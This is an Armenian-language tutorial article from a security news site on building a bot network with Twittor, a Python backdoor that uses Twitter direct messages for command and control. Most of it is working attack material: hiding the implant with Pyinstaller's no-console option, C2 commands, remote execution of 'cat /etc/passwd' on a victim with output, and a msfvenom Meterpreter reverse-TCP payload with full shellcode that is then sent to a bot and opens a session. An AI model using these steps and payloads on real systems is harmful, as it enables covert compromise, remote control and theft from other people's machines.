Սեփական ուժերով ստեղծում ենք «Bot» ցանց՝ օգտվելով Twitter-ի նամակագրությունից

samvel-gevorgyan.jpg
Սամվել Գևորգյան
Տնօրեն, «ՍԱՅԲԵՐ ԳԵՅԹՍ»
Լուսաբանում եմ այնպիսի թեմաներ, ինչպիսիք են կիբեր-հանցագործությունը, գաղտնիությունը և անվտանգությունը թվային տեսքով:

Twittor-ն իրենից ներկայացնում է Python-ի հիմքով backdoor («ծածուկ մուտք»), որն օգտագործում է Twitter-ը (նամակագրությունը) որպես «command and control» սերվեր:

twbots-610x458.jpg

Ինչպես կարգավորել

Այն աշխատացնելու համար անհրաժեշտ է՝

Անհրաժեշտ փաթեթների կարգավորում՝

$ pip install -r requirements.txt

Այս փաթեթը պարունակում է երկու ֆայլ:

Երկու ֆայլերում էլ անհրաժեշտ է «access token» փոփոխականը փոխարինել Twitter-ից նախապես ստացված տվյալներով՝

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

Իդեպ, եթե պատրաստվում եք implant.py-ից ստանալ աշխատացնող (executable) ծրագիր, ապա անհրաժեշտ է օգտվել Pyinstaller-ից: Pyinstaller-ի հետ աշխատելու ընթացքում console-ը հեռացնելու համար անհրաժեշտ է օգտագործել «--noconsole --onefile» պարամետրերը:

Ինչպես օգտագործել

Client մասն աշխատացնելու համար անհրաժեշտ է աշխատացնել այս ֆայլը՝

$ python twittor.py

Այնուհետև կբացվի ինտերակտիվ shell՝ առաջարկելով մի քանի հրամաններ՝

$ help

refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on the bot
!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
help - print this usage
exit - exit the client

$ 

Մի քանի համակարգերում (համակարգիչներում) backdoor ստեղծելուց (տեղադրելուց) հետո, կարոք եք տեսնել հասանելի client-ների ցուցակը՝ օգտագործելով հետևյալ հրամանը՝

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

Էկրանին կարտացոլվի MAC հասցեն, որն օգտագործվում է client-ներին առանձնահատուկ կերպով նույնականացնելու համար, ինչպես նաև տալիս ինֆորմացիա աշխատող Օպերացիոն Համակարգի (ՕՀ) մասին: Այս դեպքում դա Linux ՕՀ է:

Այսպես կարելի է client-ին հրաման ուղարկել՝

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Այսպիսով «B7:76:1F:0B:50:B7» համակարգչին ստիպում ենք աշխատացնել «cat /etc/passwd» հրամանը, ինչի արդյունքում ստացված jobid համարով կարողանում ենք ստանալ հրամանի արդյունքները՝

Փորձենք ստանալ արդյունքները

$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)

Այս դեպքում օգտագործեցինք !retrieve հրամանը՝ նշելով նախապես ստացած jobid համարը:

Ստանալ նախորդ հրամանները

Ինչպես նախապես նշվել էր, (նախորդ) հրամանները կարելի է վերադարձնել հին նամակագրությունից (սահմանափակումը՝ 200): Վերադարձնելու համար անհրաժեշտ է կանչել list_commands հրամանը:

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Աշխատացնել shellcode (Windows Օպերացիոն համակարգերում)

Այս կարգավորումը կարող է շատ հեշտացնել meterpreter-ից սեսիա (session) կանչելու համար: Մանրամասն կարող եք կարդալ այստեղ:

Ստեղծում ենք shellcode meterpreter-ի համար՝

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

Այնուհետև անհրաժեշտ է բացել (extract) shellcode-ը և ուղարկել նշված bot-ին՝ օգտվելով !shellcode հրամանից:

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

Եվ վերջ:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615 
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Աղբյուրը

https://github.com/PaulSec/twittor

Հատկորոշիչներ

Կիսվել հոդվածով

Մեկնաբանություններ ()

Առաջարկվող հոդվածներ


Ակնթարթային ծանուցումներ

Բաժանորդագրվե՛ք «Telegram»-ի մեր խմբին, որպեսզի առաջինը տեղեկանաք կիբերանվտանգության վերջին նորություններին, ռեսուրսներին և վերլուծություններին: